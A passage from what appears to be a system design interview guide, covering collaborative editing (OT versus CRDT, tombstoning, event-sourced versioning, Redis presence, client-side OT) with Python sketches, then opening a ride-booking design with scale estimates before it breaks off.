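        return text[:op.pos] + op.char + text[op.pos:]
    return text[:op.pos] + text[op.pos + 1:]


# The Alice/Bob example: both ops were generated against "BC".
alice = Op("insert", 0, "A")
bob = Op("insert", 2, "D")
server_doc = apply_op("BC", alice)                          # Alice commits first
naive = apply_op(server_doc, bob)                           # no transform
converged = apply_op(server_doc, transform(bob, alice))     # with transform
print(naive, converged)
```

Running it prints `ABDC ABCD`: the untransformed op lands one position too early, while the transformed op reproduces the converged document from the example.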

CRDT (Conflict-free Replicated Data Type)

The core guarantee of a CRDT: any two peers that have seen the same set of operations converge to the same document state, regardless of the order in which those operations arrived. No central server is required to enforce this. The data structure itself guarantees convergence.

The fundamental difference from OT: OT needs a server to impose order before merging. CRDT makes operations commutative — you can apply them in any order and always get the same result.

How CRDT Merge Works (Operation-Based)

In the operation-based model (which is what text editors use), each peer sends only the delta — the operation — not the full document. The key insight is that every character gets a permanent unique identity, not an integer position that shifts when other chars are inserted.

Each character carries:
  id:    a unique identifier (never reused, even after deletion)
  after: the id of the character this was inserted after (the "anchor")
  value: the character itself

The same Alice/Bob problem — solved with CRDT:

Recall the problem from the OT section:

Document: "BC"   (B has id=1, C has id=2)

Alice inserts "A" at the start:
  OT op:   { insert, pos=0, char="A" }       ← integer position, shifts on merge
  CRDT op: { id=3, after=START, value="A" }  ← anchored to START, never shifts
  Alice's state: "ABC"

Bob inserts "D" after "C":
  OT op:   { insert, pos=2, char="D" }       ← integer position 2, relative to "BC"
  CRDT op: { id=4, after=id2, value="D" }    ← anchored to C (id=2), never shifts
  Bob's state: "BCD"

Why OT fails without a server and CRDT doesn't:

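With OT, a position is only meaningful relative to a specific document version. When the two ops cross, each op must be transformed against the other, and every replica must agree on which op counts as "first" (here, Bob's position 2 shifts to position 3 because Alice's insert at position 0 was ordered ahead of it). In this design that agreement comes from the server's commit order.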

With CRDT, no transformation is needed:

Alice's op says: "put 'A' after START." That's true regardless of what Bob did.
Bob's op says: "put 'D' after id=2 (C)." That's true regardless of what Alice did.

Both peers simply apply both ops:

  START → A(id=3) → B(id=1) → C(id=2) → D(id=4)
  Rendered: "ABCD"  ✓

Alice applies Bob's op:   START → A(id=3) → B(id=1) → C(id=2) → D(id=4) = "ABCD" ✓
Bob applies Alice's op:   START → A(id=3) → B(id=1) → C(id=2) → D(id=4) = "ABCD" ✓
Both converge without any server involvement.

The key difference in one line:

OT says "insert at position N" — positions shift, so a server must impose order before transforming.
CRDT says "insert after character X (by id)" — ids never shift, so any peer can merge in any order.

What if two peers insert at the same anchor concurrently?

Document: "AC"  (A has id=1, C has id=2)

Alice types "B" after A:  op { id=3, after=id1, value="B" }  →  "ABC"
Bob   types "X" after A:  op { id=4, after=id1, value="X" }  →  "AXC"

Both ops say "after id=1". Tie-break: sort by peer identity (e.g. alphabetical).
"alice" < "bob" → Alice's character goes first.

Both peers converge to: "ABXC"  ✓  (consistent, even if arbitrary)

The result is always consistent. The tie-break is arbitrary but deterministic — the same rule on every peer produces the same order. OT has the same limitation: the server picks a commit order that's equally arbitrary.
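A minimal sketch of this merge rule, assuming an RGA-style tree in which each character hangs off its anchor. The `SequenceCRDT` class and the `(counter, peer)` id format are assumptions made for the example (the text above uses plain integer ids), and operations are assumed to arrive after the character they anchor to.

```python
from dataclasses import dataclass, field

START = (0, "")  # sentinel anchor for the beginning of the document


@dataclass
class Node:
    id: tuple                 # (counter, peer): unique and never reused
    value: str
    children: list = field(default_factory=list)


class SequenceCRDT:
    def __init__(self):
        self.nodes = {START: Node(START, "")}

    def insert(self, id, after, value):
        if id in self.nodes:  # duplicate delivery is harmless
            return
        node = Node(id, value)
        self.nodes[id] = node
        siblings = self.nodes[after].children
        siblings.append(node)
        # Newer counters sit closer to the anchor; concurrent inserts
        # (same counter) are ordered by peer name, so "alice" < "bob".
        siblings.sort(key=lambda n: (-n.id[0], n.id[1]))

    def text(self):
        out, stack = [], [self.nodes[START]]
        while stack:  # iterative pre-order walk
            node = stack.pop()
            if node.id != START:
                out.append(node.value)
            stack.extend(reversed(node.children))
        return "".join(out)


def replica(ops):
    r = SequenceCRDT()
    for op in ops:
        r.insert(*op)
    return r


base = [((1, "seed"), START, "A"), ((2, "seed"), (1, "seed"), "C")]
alice_op = ((3, "alice"), (1, "seed"), "B")
bob_op = ((3, "bob"), (1, "seed"), "X")

alice_view = replica(base + [alice_op, bob_op])  # Alice sees her op first
bob_view = replica(base + [bob_op, alice_op])    # Bob sees his op first
print(alice_view.text(), bob_view.text())
```

Both replicas print `ABXC` even though they applied the two concurrent inserts in opposite orders, because the sibling order depends only on the ids.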

Tombstoning — The Hidden Cost of CRDT

Deleted characters cannot be physically removed from a CRDT. This is the most important production constraint.

Here's why:

Document: A(id=1) → B(id=2) → C(id=3)

Alice deletes B. Her view: A(id=1) → C(id=3)

Bob (offline) types "D" after B — his op says: "after id=2"

Bob reconnects. If B was physically deleted, id=2 no longer exists.
Bob's operation has no anchor — it cannot be placed correctly.

Solution: B becomes a tombstone — invisible to the user, but still in the structure:
  A(id=1) → [B, id=2, deleted] → D(id=4) → C(id=3)
  Rendered: "ADC"

At scale: A heavily-edited document accumulates tombstones — invisible deleted characters that stay in memory on every client. A 10,000-word document could have 50,000 tombstones. Periodic cleanup ("compaction") removes them once every peer has confirmed they've seen the deletion — but coordinating that cleanup across offline mobile clients is a hard engineering problem.
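The tombstone behavior can be illustrated with a flat list. This is a simplified sketch: the `Char` type and the `mark_deleted`, `insert_after`, and `compact` helpers are hypothetical names, concurrent-sibling ordering is ignored, and "every peer has confirmed" is modeled as a set of peer names.

```python
from dataclasses import dataclass, field


@dataclass
class Char:
    id: int
    value: str
    deleted: bool = False
    seen_by: set = field(default_factory=set)  # peers that know about the deletion


def insert_after(doc, anchor_id, char):
    # The anchor is found even when it is a tombstone.
    idx = next(i for i, c in enumerate(doc) if c.id == anchor_id)
    doc.insert(idx + 1, char)


def mark_deleted(doc, char_id, peer):
    for c in doc:
        if c.id == char_id:
            c.deleted = True
            c.seen_by.add(peer)


def render(doc):
    return "".join(c.value for c in doc if not c.deleted)


def compact(doc, all_peers):
    # Drop a tombstone only once every peer has seen the deletion.
    return [c for c in doc if not (c.deleted and c.seen_by >= all_peers)]


peers = {"alice", "bob"}
doc = [Char(1, "A"), Char(2, "B"), Char(3, "C")]

mark_deleted(doc, 2, "alice")            # Alice deletes B
insert_after(doc, 2, Char(4, "D"))       # Bob's offline op still finds its anchor
rendered = render(doc)

before_ack = compact(doc, peers)         # Bob has not confirmed: tombstone stays
mark_deleted(doc, 2, "bob")              # Bob's replica confirms the deletion
after_ack = compact(doc, peers)          # now the tombstone can be dropped
print(rendered, len(before_ack), len(after_ack))
```

The document renders as `ADC` throughout; only the stored length changes (4 entries before Bob confirms, 3 after), which is the memory cost the paragraph above describes.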

[!NOTE]
Key Insight: Tombstoning is not a bug — it is the price of CRDT's "no central server" guarantee. You cannot fully delete a character until every peer has acknowledged the deletion. OT has no tombstoning because the server is always the ordering authority — deletion is final immediately.

OT vs CRDT — Comparison

Dimension	OT	CRDT
Server required	Yes — single central ordering server per document	No — peers merge independently
Conflict resolution	Transform function adjusts positions against concurrent ops	Operations are self-describing (anchor by id) — no transform needed
Offline editing	Hard — must reconnect to server to reconcile	Native — peers merge op sets in any order
Deletion	Final — server confirms immediately	Tombstone — char stays in structure until all peers confirm
Compaction overhead	None	Required — periodic cleanup of accumulated tombstones
Data structures	Linear text (transform rules don't generalize)	Arbitrary structures (JSON trees, shapes)
Used by	Google Docs (historically)	Figma (CRDT-inspired, with a central server); libraries such as Yjs and Automerge

Chosen for this design: OT

[!NOTE]
Key Insight: OT vs CRDT is not about which is "better" — it is about topology. OT requires a central server, which is a cost only if you don't already have one. Google Docs already has a central server for auth, versioning, and billing — OT's requirement is free. CRDT's advantages (no server, offline-native) only matter when you genuinely need peer-to-peer or multi-region without a single home region.

6.3 Fast Path vs Reliable Path

Every operation in Google Docs travels both paths simultaneously.

Fast Path (Latency-Optimized)

The client applies the operation to its local document model before the operation reaches the server. The user sees their keystroke reflected in the UI with zero network latency. If the server later transforms the operation, the client reconciles silently.

[!NOTE]
Key Insight: The client applies the operation locally BEFORE the server ACK. This is what makes Google Docs feel instant. In a chat app, the message is stored server-side first. In a text editor, visual latency matters more than consistency — you must feel that your keystroke registered immediately.

Reliable Path (Durability-Optimized)

The OT Server writes the operation to Cassandra before broadcasting to peers. If the server crashes mid-broadcast, operations are never lost — they are replayed from the log on reconnect. The Kafka stream drives background snapshot creation without blocking the critical path.

Reconnect flow:

Client reconnects with last_applied_version = 142
Server queries Cassandra: all ops for doc_id X where version > 142
Server sends missed operations to client
Client applies them in order, transforming against any pending local ops

Key difference from chat systems: In Google Docs, the CLIENT applies the operation before the server ACK. In a chat app, the server stores the message first. This reflects the priority difference — in docs, visual latency matters more than consistency; in chat, message durability matters more than render speed.

6.4 Versioning (Operations Log + Snapshots = Event Sourcing)

[!NOTE]
Key Insight: Google Docs versioning is identical to the Event Sourcing pattern. The Operations Log is the event store. Document snapshots are materialized views. To reconstruct any historical state: fetch the nearest snapshot before the target version, then replay operations forward.

Operations Log Schema (Cassandra)

Table: document_operations

Partition key:  doc_id          UUID
Clustering key: version         BIGINT  (ascending)

Columns:
  op_type     TEXT        -- "insert" | "delete"
  position    INT
  content     TEXT        -- character(s) inserted
  user_id     UUID
  client_id   UUID
  timestamp   TIMESTAMP

Why Cassandra?

Append-only write pattern — operations are never updated, only inserted. Cassandra's LSM-tree is optimized for append-heavy workloads.
Partition by doc_id — all operations for a document are co-located on the same partition, enabling fast sequential reads for replay.
High write throughput — Cassandra handles millions of writes/sec natively with tunable consistency.

Snapshot Lifecycle

Version Restore Algorithm

1. User requests restore to version V
2. Query: SELECT MAX(snapshot_version) WHERE doc_id = X AND snapshot_version <= V
3. Fetch snapshot binary from S3 (via CDN if recent)
4. Query: SELECT op FROM document_operations
          WHERE doc_id = X
            AND version > snapshot_version
            AND version <= V
5. Apply each operation in order to the snapshot base state
6. Return reconstructed document
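The restore steps above can be sketched with in-memory stand-ins for S3 and Cassandra. The `restore` and `apply_op` names, the dict of snapshots, and the list of op rows are assumptions for illustration; the field names follow the operations log schema, and deletes are assumed to remove one character.

```python
import bisect


def apply_op(text, op):
    pos = op["position"]
    if op["op_type"] == "insert":
        return text[:pos] + op["content"] + text[pos:]
    if op["op_type"] == "delete":
        return text[:pos] + text[pos + 1:]
    raise ValueError(f"unknown op_type: {op['op_type']}")


def restore(snapshots, ops, target_version):
    """snapshots: {version: text}; ops: rows sorted by ascending version."""
    versions = sorted(snapshots)
    # Step 2: nearest snapshot at or before the target version.
    i = bisect.bisect_right(versions, target_version) - 1
    base_version = versions[i] if i >= 0 else 0
    text = snapshots[base_version] if i >= 0 else ""
    # Steps 4-5: replay ops in (base_version, target_version].
    for op in ops:
        if base_version < op["version"] <= target_version:
            text = apply_op(text, op)
    return text


ops = [
    {"version": 1, "op_type": "insert", "position": 0, "content": "B"},
    {"version": 2, "op_type": "insert", "position": 1, "content": "C"},
    {"version": 3, "op_type": "insert", "position": 0, "content": "A"},
    {"version": 4, "op_type": "insert", "position": 3, "content": "D"},
    {"version": 5, "op_type": "delete", "position": 1, "content": ""},
]
snapshots = {2: "BC"}

print(restore(snapshots, ops, 4))  # replays versions 3 and 4 on top of "BC"
```

Restoring to version 4 starts from the version-2 snapshot and replays only two operations, which is why snapshot spacing bounds restore latency.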

Storage optimization: Raw operations are retained for 30 days. After 30 days, old operations are compacted — the snapshot becomes the source of truth and individual ops are deleted. Users can still view the version (via snapshot) but cannot replay individual keystrokes.

6.5 Cursor and Presence

Cursor state is ephemeral — it has a natural expiry when the user stops moving or disconnects. Storing cursor positions in a relational database would add unnecessary write amplification for data that expires within seconds.

Cursor Flow

Redis Cursor Schema

Key:   cursor:{doc_id}
Type:  Hash
Field: {user_id}
Value: { pos: 29, selection: {start: 29, end: 35}, color: "#FF6B6B", ts: 1709123456 }
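TTL:   30 seconds (refreshed on each cursor update)
Note:  EXPIRE applies to the whole hash key, so one active user keeps every field alive. For per-user expiry, use one key per user (cursor:{doc_id}:{user_id}), per-field TTLs (HEXPIRE, Redis 7.4+), or have readers drop entries whose ts is older than 30 seconds.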

[!NOTE]
Key Insight: Presence is ephemeral — Redis with TTL handles cleanup automatically. When a user disconnects without sending an explicit "offline" event (e.g., browser tab killed), the TTL ensures the cursor entry expires within 30 seconds. Storing cursor/presence state in PostgreSQL would require a background cleanup job to purge stale rows. Redis TTL is the correct primitive for data with natural expiry.
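The expiry behavior can be illustrated with an in-memory stand-in. This is not Redis client code: the `PresenceStore` class is hypothetical, it models one expiring entry per (doc_id, user_id), and the clock is injectable so the example does not need to sleep.

```python
import time


class PresenceStore:
    def __init__(self, ttl_seconds=30, clock=time.monotonic):
        self.ttl = ttl_seconds
        self.clock = clock
        self.entries = {}  # (doc_id, user_id) -> (expires_at, cursor)

    def update(self, doc_id, user_id, cursor):
        # Every cursor update refreshes that user's expiry.
        self.entries[(doc_id, user_id)] = (self.clock() + self.ttl, cursor)

    def active(self, doc_id):
        now = self.clock()
        return {
            user: cursor
            for (doc, user), (expires_at, cursor) in self.entries.items()
            if doc == doc_id and expires_at > now
        }


now = [0.0]                                   # fake clock for the example
store = PresenceStore(ttl_seconds=30, clock=lambda: now[0])

store.update("doc1", "alice", {"pos": 29})    # t = 0
now[0] = 10.0
store.update("doc1", "bob", {"pos": 5})       # t = 10
now[0] = 35.0                                 # Alice's tab was killed at t = 0
print(sorted(store.active("doc1")))           # Alice has aged out, Bob has not
```

No cleanup job runs here: an entry simply stops being returned once its expiry passes, which mirrors what a TTL gives you for free.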

Presence State Machine

7. ⚖️ Key Trade-offs

Trade-off 1: OT vs CRDT

Aspect	OT	CRDT
Control	Centralized — one server imposes total order	Distributed — peers merge independently
Complexity	Medium — transform function per op-type pair	High — tombstoning, compaction, vector clock GC
Ordering	Required — server version number is the total ordering	Not required — operations are commutative by design
Offline support	Hard — server reconciliation required on reconnect	Native — any peer merges any op set in any order
Data structures	Linear text only — transform rules don't generalize	Arbitrary — Automerge handles JSON trees, shapes
Integration with auth/versioning	Natural fit — central server already exists	Requires retrofitting — designed for no-server topologies
Tombstone overhead	None	Required — deleted chars stay as markers until GC

Chosen for this design: OT.
One-line reason: a central server is already required for access control, versioning, and billing — OT's single-ordering-point requirement is not an additional constraint. CRDT's primary advantage (no central server) is irrelevant when the central server already exists.

Where to Use OT vs CRDT vs Both — The Honest Answer

[!IMPORTANT]
Google Docs historically used OT (the approach Google Wave shipped in 2009, derived from the earlier Jupiter algorithm). Whether the current production system uses pure OT, CRDT, or a hybrid is not publicly confirmed by Google. The original design is well documented. The current design at Google's scale (billions of documents, offline Android/iOS apps, multi-region) may have evolved. Claiming certainty either way is incorrect.

Use Case	Right Choice	Reason
Real-time online collaborative editing, < 100ms latency	OT	Central server already exists; low complexity; fast path
Mobile offline editing (hours or days offline)	CRDT	Reconnect reconciliation without server round-trip; offline ops merge natively
Multi-region active-active (no single "home" region)	CRDT	OT's single ordering server becomes a cross-region bottleneck
Structured data (shapes, JSON trees, embedded objects)	CRDT (Automerge-style)	OT transform functions don't generalize beyond linear text
Comments, suggestions, presence metadata	CRDT or last-write-wins	Not linear text; central ordering less critical
Short offline windows (< 1 min), server always reachable	OT	Reconnect is a simple log catch-up; CRDT overhead not justified

Can Google use both? Yes — and this is the likely direction at scale:

Layer 1: Real-time online editing (happy path)
  → OT Server handles the live session
  → All clients connected → central ordering → < 100ms latency

Layer 2: Offline / multi-device reconciliation (cold path)
  → Mobile app goes offline for hours
  → On reconnect: large divergence window → CRDT-style merge
  → Treat offline edits as concurrent CRDT ops; server applies merge rules

Layer 3: Structured content (comments, embedded objects, JSON)
  → These are not linear text — OT transform rules don't cover them
  → JSON CRDT (Automerge) handles arbitrary data structures natively

This is a hybrid architecture: OT for the hot real-time path, CRDT for the cold/offline path and non-text data. Neither algorithm alone handles all cases at Google's scale and product surface.

Signal	Choose OT	Choose CRDT
Server topology	Central server already exists	Peer-to-peer or multi-master
Offline window	Short (seconds to minutes)	Long (hours, days, mesh networks)
Data model	Linear text	Arbitrary structures (JSON, vector graphics)
Team / maintenance	Small team, correctness priority	Large infra team comfortable with compaction and GC
Real-world examples	Google Docs (historically), Google Wave	Editors built on Yjs or Automerge

[!IMPORTANT]
OT = simpler but centralized. CRDT = distributed but carries tombstone and compaction cost.
The correct answer in an interview is not "use OT" or "use CRDT" — it is: "OT for the real-time hot path where a central server already exists; CRDT for offline reconciliation and non-text structured data where distributed merge is genuinely required."

[!NOTE]
Key Insight: The reason to know CRDT deeply is not to argue for replacing OT. It is to design the offline and structured-data layers correctly — the layers where OT's central ordering requirement becomes a bottleneck rather than a free constraint.

Trade-off 2: WebSocket vs HTTP Long-Polling vs SSE

Dimension	WebSocket	Long-Polling	SSE
Bidirectional	Yes	Simulated (2 connections)	No (server-to-client only)
Latency	Lowest — persistent connection	High — new HTTP request per message	Low — persistent, but client cannot push
Infrastructure complexity	Sticky routing required; stateful	Stateless — any node	Stateless
Real-time op delivery	Native	Possible but wasteful	Cannot receive client ops

Chosen: WebSocket.
One-line reason: collaborative editing requires both the client pushing operations and the server pushing transforms — true bidirectional communication is mandatory.

[!NOTE]
Key Insight: The WebSocket sticky routing requirement (each client for a doc_id must connect to the same OT Server node) is a direct consequence of OT's single-ordering-point requirement. It is not a weakness of WebSocket — it is the architecture expressing the correctness constraint of OT.

Trade-off 3: Delta Operations vs Full Document Replacement

Dimension	Delta Operations	Full Document Replacement
Payload size	~200 bytes per op	~50 KB per keystroke
Concurrent edit safety	OT/CRDT ensures convergence	Last-writer-wins — silent data loss
Network throughput at 1M editors	~1 GB/sec (manageable)	~250 GB/sec (catastrophic)
Reconnect catch-up	Replay missed ops from log	Fetch current document snapshot

Chosen: Delta operations.
One-line reason: full document replacement causes both catastrophic bandwidth usage and silent data loss under concurrent edits.

Trade-off 4: At-Least-Once vs Exactly-Once Delivery

Dimension	At-Least-Once	Exactly-Once
Complexity	Low	High — requires distributed transactions
Risk	Duplicate operations (detectable)	None
Mitigation	Idempotency via client_id + version dedup	Not needed
Latency impact	Minimal	Adds 2PC overhead on critical path

Chosen: At-least-once with idempotency.
One-line reason: exactly-once delivery requires distributed transactions (for example, two-phase commit) that add latency on the critical edit path. Deduplicating by (client_id, version) on the OT server catches all duplicates at negligible cost.

[!NOTE]
Key Insight: At-least-once delivery is safe in OT because each operation carries a version and client_id. The OT server detects and drops duplicates in O(1) by writing one Redis key per (client_id, version) with SET ... NX and a TTL; a failed NX write means the op was already seen. The operations log in Cassandra provides the durable deduplication record for longer windows.
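A minimal sketch of the dedup check, using an in-memory set in place of Redis. The `OpDeduplicator` class is a hypothetical name, and TTL-based eviction is left out to keep the example short.

```python
class OpDeduplicator:
    def __init__(self):
        self.seen = set()

    def accept(self, client_id, version):
        """Return True the first time an op is seen, False for a retry."""
        key = (client_id, version)
        if key in self.seen:
            return False  # duplicate delivery: drop it
        self.seen.add(key)
        return True


dedup = OpDeduplicator()
first = dedup.accept("client-7", 143)      # original send
retry = dedup.accept("client-7", 143)      # client retried after a lost ACK
next_op = dedup.accept("client-7", 144)    # a genuinely new op
print(first, retry, next_op)
```

Because the check is a single set lookup keyed on (client_id, version), a client can retry freely after a timeout without the op being applied twice.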

8. Interview Summary

Decision Table

Decision	Problem It Solves	Trade-off Accepted
Delta operations (not file replacement)	Catastrophic bandwidth; concurrent write data loss	Requires conflict resolution algorithm
Operational Transformation (OT)	Concurrent edits produce divergent documents	Requires single central ordering server per document
WebSocket (not HTTP)	Server must push transformed ops to all peers	Sticky routing required; stateful infrastructure
Cassandra for operations log	5M writes/sec; append-only; partition by doc_id	Eventual consistency on reads (acceptable for log replay)
Redis for cursors/presence with TTL	Cursor data is ephemeral; DB writes would be wasteful	Not durable — cursor state lost on Redis failover (acceptable)
S3 + CDN for document snapshots	Fast initial load for large documents; CDN caches globally	Eventual consistency between snapshot and live ops
Optimistic local apply	Users must feel keystrokes are instant	Client must handle rollback if server rejects op (rare)
Kafka for snapshot pipeline	Decouple snapshot creation from OT critical path	Small lag between committed ops and snapshot availability

Mental Model Summary

Google Docs is a two-path system. The fast path optimistically applies every keystroke locally, ships it over a persistent WebSocket to an OT Server that transforms it against any concurrent operations, then fans it out to all collaborators. The reliable path appends every operation to an immutable Cassandra log before the ACK is sent, enabling replay, versioning, and reconnect recovery. The hardest problem is concurrent edit reconciliation: OT requires a single central server to serialize operations and apply transformation functions that adjust character positions across all concurrent operations. Cursor positions are ephemeral and stored in Redis with TTL. Document history is event-sourced: snapshot + operation replay reconstructs any historical state.

Key Insights Checklist

OT requires a single central server per document — this is a correctness requirement, not an architectural weakness. Without a single ordering point, two nodes could transform the same concurrent ops in different orders, producing permanently divergent documents.
The client applies keystrokes locally before the server ACK — this optimistic apply is what makes Google Docs feel instant. The server transforms and confirms asynchronously; the client reconciles silently.
OT for the hot path, CRDT for the cold path — OT is right for real-time editing where a central server already exists. CRDT is right for long offline windows, multi-region without a home region, or non-text structured data (JSON, shapes). Google's production system likely uses both. Neither algorithm alone handles all cases at scale.
CRDT merge works by unique IDs, not integer positions — each character gets a permanent unique identity. An op says "insert after id=X", not "insert at position N". Positions shift; IDs don't. This is why CRDT needs no server to resolve conflicts — the merge is self-describing.
CRDT's hidden cost is tombstoning — deleted characters cannot be physically removed until every peer confirms the deletion. Heavily-edited documents accumulate invisible tombstones that require periodic compaction. OT has no tombstoning because the server is always the authority — deletion is final immediately.
Cursor data belongs in Redis, not a database — it is ephemeral, high-frequency, and has a natural TTL. Storing it in PostgreSQL or Cassandra would add write amplification for data that expires in 30 seconds anyway.
Versioning is event sourcing — the operations log is the event store; snapshots are materialized views. Restore = nearest snapshot + operation replay. This pattern provides both durable history and efficient current-state access.

Frontend Notes: Google Docs

Complexity split: Backend 65%, Frontend 35%

The backend carries the majority of the design weight: OT engine correctness, operations log durability, WebSocket fan-out, and snapshot management. However, the frontend in Google Docs is significantly more complex than a typical web application. The client runs a partial OT engine, manages an optimistic local document model, handles offline buffering, and renders collaborative cursors in real time. These are non-trivial engineering problems that warrant dedicated discussion in a system design interview.

F1: Client-Side OT (The Hardest Frontend Problem)

The client is not a passive receiver of server operations. It runs its own OT transformation engine to reconcile incoming remote operations against locally pending (not-yet-ACKed) operations.

Why this is necessary:

Suppose the client sends op A to the server. While waiting for the ACK, the user types op B locally. Before the server ACKs A, a remote op C arrives from another collaborator. C was generated against the server's state before A was committed. But locally, the document already has A and B applied. The client must transform C against both A and B before applying it — otherwise C will be applied at the wrong position.

Client OT State Machine:

State variables maintained by the client:

local_doc:       Current in-memory document model (all local ops applied)
committed_doc:   Last server-confirmed document state
pending_ops:     Queue of ops sent but not yet ACKed by server
buffered_ops:    Ops typed while previous op is in-flight
local_version:   Client's current version count
server_version:  Last confirmed server version

Incoming remote op processing:

function applyRemoteOp(remote_op):
    // remote_op was generated against server_version V
    // unacked = pending_ops followed by buffered_ops:
    // every local op the server has not yet committed
    transformed = remote_op
    for each local_op in unacked (oldest first):
        next = transform(transformed, local_op)
        // rebase the local op too, so later remote ops see its updated position
        replace local_op with transform(local_op, transformed)
        transformed = next
    apply(transformed, local_doc)
    // adjust all collaborator cursors for this operation
    for each cursor in remote_cursors:
        cursor.pos = transformPosition(cursor.pos, transformed)

[!NOTE]
Key Insight: The client OT engine transforms incoming remote ops against the client's pending (unACKed) local ops — not against all local ops. Only unACKed ops are "invisible" to the server. ACKed ops are already reflected in the server's state and thus in the remote op's base version.
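A runnable sketch of this client-side transform, restricted to single-character inserts. The `Client` and `Insert` names are hypothetical, and one assumption is made explicit: when a remote op and an unACKed local op target the same position, the remote op (already committed on the server) is placed first.

```python
from dataclasses import dataclass


@dataclass
class Insert:
    pos: int
    char: str


class Client:
    def __init__(self, text):
        self.local_doc = text
        self.unacked = []  # local ops the server has not committed yet

    def type(self, pos, char):
        # Optimistic apply: mutate the local model, then queue the op.
        self.local_doc = self.local_doc[:pos] + char + self.local_doc[pos:]
        self.unacked.append(Insert(pos, char))

    def apply_remote(self, remote):
        pos = remote.pos
        for local in self.unacked:
            # A local insert strictly before the remote position shifts it right.
            new_pos = pos + 1 if local.pos < pos else pos
            # Rebase the local op past the remote one (remote wins ties).
            if pos <= local.pos:
                local.pos += 1
            pos = new_pos
        self.local_doc = self.local_doc[:pos] + remote.char + self.local_doc[pos:]


client = Client("xyz")
client.type(0, "1")                     # op A, not yet ACKed
client.type(1, "2")                     # op B, typed while A is in flight
client.apply_remote(Insert(3, "!"))     # op C, generated against "xyz"
print(client.local_doc)
```

Op C was generated for the end of "xyz"; after being shifted past A and B it still lands at the end of the local document, giving `12xyz!`.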

F2: Offline Editing

Google Docs supports continued editing when the network is unavailable. The client buffers operations locally and synchronizes on reconnect.

Offline flow:

IndexedDB schema for offline buffer:

Store: offline_ops
  doc_id:     String
  op:         Object (full operation delta)
  local_seq:  Number (local ordering)
  timestamp:  Number

Reconnect reconciliation: On reconnect, the server may have received operations from other collaborators during the offline period. The client's buffered ops must be transformed against all server ops that committed during the offline window. This is the same transform logic as online — the only difference is that the gap between last_known_server_version and current_server_version may be large.

[!NOTE]
Key Insight: Offline editing is where CRDT has a natural advantage — CRDTs merge offline changes without a server round-trip. With OT, the server must be involved in reconciling offline ops. For Google Docs (which already has a central server), this is acceptable. The reconnect transform is the same algorithm as normal online operation, just with a larger operation gap.

F3: Cursor Rendering

Rendering collaborative cursors involves three problems: position tracking, color assignment, and position adjustment when remote operations arrive.

Color assignment: On WebSocket session join, the server assigns a unique color per (user_id, doc_id, session). The color is consistent across all clients in the session — all users see Alice's cursor as the same color.

Cursor DOM rendering:

- Each collaborator's cursor is an absolutely-positioned CSS pseudo-element
- Cursor position = character offset in the ProseMirror / Quill document model
- Name label floats above the cursor line (CSS tooltip, hidden after 3s of inactivity)
- Selection ranges rendered as semi-transparent background color fills

Cursor position adjustment on remote op:

function adjustCursorsForOp(op, cursors):
    for each (user_id, cursor) in cursors:
        if op.type == "insert" and cursor.pos >= op.pos:
            cursor.pos += 1   // text inserted at or before the cursor pushes it right
        else if op.type == "delete" and cursor.pos > op.pos:
            cursor.pos -= 1   // text deleted before the cursor pulls it left
        // a delete exactly at cursor.pos leaves the cursor at the deletion point

Throttling: Cursor position updates are throttled to at most one every 50ms per user before sending to the server. With 5 collaborators each moving their cursor continuously, that caps inbound cursor traffic at 100 messages/sec per document (5 users × 20 updates/sec), a small load for the server to fan out.

F4: Optimistic UI and Rollback

Optimistic apply means the client mutates the local document model immediately on every keystroke, without waiting for the server to ACK the operation. The user sees their change reflected in under 1ms (local JS execution) rather than in 50-100ms (network round-trip).

Rollback (rare):

The server can reject an operation if:

The operation's base version is too old (client was offline too long and the transform gap is unresolvable)
The user lost editing permission mid-session
A server-side validation failure (e.g., document size limit exceeded)

On rejection:

1. Remove rejected op from pending_ops
2. Undo all local ops applied after the rejected op (in reverse order)
3. Apply the server's authoritative state
4. Re-apply any subsequent buffered ops that are still valid
5. Display subtle "sync error" indicator if reconciliation fails

In practice, rollback is extremely rare (less than 0.01% of operations). The architecture optimizes for the 99.99% case where the op is accepted and the ACK arrives within 100ms.

[!NOTE]
Key Insight: Optimistic UI requires a local undo stack that is separate from the user-facing Ctrl+Z undo history. The internal rollback stack tracks unACKed ops for reconciliation purposes. The user-facing undo history tracks logical editing intent. Conflating them would cause Ctrl+Z to undo server reconciliation adjustments that the user never consciously made.

Ride Booking (Uber / Ola)

Arghya Majumder — Fri, 27 Mar 2026 22:54:15 +0000

System Design: Ride Booking (Uber / Rapido)

1. Problem + Scope

Design a ride-booking platform (Uber / Rapido) supporting fare estimation, driver matching, real-time location tracking, and payment — at millions of concurrent users and drivers.

In Scope: Fare estimation, ride booking, driver matching, real-time location tracking (rider and driver), trip start/end, ratings, payments, surge pricing.

Out of Scope: Driver onboarding, fleet management, surge zone boundary drawing, fraud detection internals, driver incentive programs.

2. Assumptions & Scale

Inputs:
  Total drivers online:       5 million
  Daily rides:                20 million
  Peak concurrent requests:   500,000
  Location update frequency:  every 1s (ON_TRIP), every 2s (RESERVED), every 5s (IDLE)

Location writes/sec:
  5M drivers x (1 update / 3s avg) = ~1.67M writes/sec -> Redis must handle this

WebSocket connections (peak):
  5M drivers + ~2M active riders = ~7M persistent connections

Trip events/sec (Kafka):
  20M rides/day / 86,400s = ~231 rides/sec (even at a few events per ride, well within Kafka capacity)

Storage:
  Trip record: ~1 KB x 20M rides/day = 20 GB/day (PostgreSQL)
  Location history (waypoints): ~500 GPS points x 16B x 20M trips = ~160 GB/day (cold)
  Driver metadata: 5M drivers x 1 KB = 5 GB (static, fits in memory)

Bandwidth comparison:
  Location update frame (WebSocket): ~20 bytes
  Location update frame (HTTP polling): ~2 KB (headers + body)
  At 1.67M updates/sec: WebSocket = 33 MB/s vs HTTP = 3.3 GB/s -> WebSocket wins 100x
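The estimates above can be reproduced with a few lines of arithmetic. This is only a back-of-envelope check of the stated inputs; the variable names are illustrative, and 1 KB is taken as 1,000 bytes.

```python
drivers_online = 5_000_000
avg_update_interval_s = 3          # blended across ON_TRIP / RESERVED / IDLE
daily_rides = 20_000_000

location_writes_per_sec = drivers_online / avg_update_interval_s
rides_per_sec = daily_rides / 86_400

ws_frame_bytes = 20                # WebSocket location frame
http_request_bytes = 2_000         # HTTP polling: headers + body
ws_bytes_per_sec = location_writes_per_sec * ws_frame_bytes
http_bytes_per_sec = location_writes_per_sec * http_request_bytes

trip_storage_gb_per_day = daily_rides * 1_000 / 1e9
waypoint_storage_gb_per_day = 500 * 16 * daily_rides / 1e9

print(f"location writes/sec: {location_writes_per_sec / 1e6:.2f}M")
print(f"rides/sec:           {rides_per_sec:.0f}")
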